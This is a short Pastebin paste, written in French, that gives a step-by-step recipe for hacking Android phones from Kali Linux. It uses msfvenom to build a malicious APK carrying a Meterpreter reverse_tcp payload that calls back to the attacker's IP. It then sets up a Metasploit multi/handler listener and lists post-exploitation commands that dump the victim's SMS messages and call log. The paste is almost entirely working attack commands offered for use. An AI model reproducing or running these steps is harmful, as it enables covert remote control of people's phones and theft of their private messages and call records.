Advertisement
hackerfree

hack android sous kali linux 2.0

Oct 1st, 2015
823
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=tonip LPORT=4444 R > tuto.apk
  2. msfconsole
  3. use multi/handler
  4. set PAYLOAD android/meterpreter/reverse_tcp
  5. set LHOST votreIP
  6. set LPORT 4444
  7. exploit
  8.  
  9. commande d'utilisation
  10. sysinfo
  11. dump_sms
  12. dump_calllog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement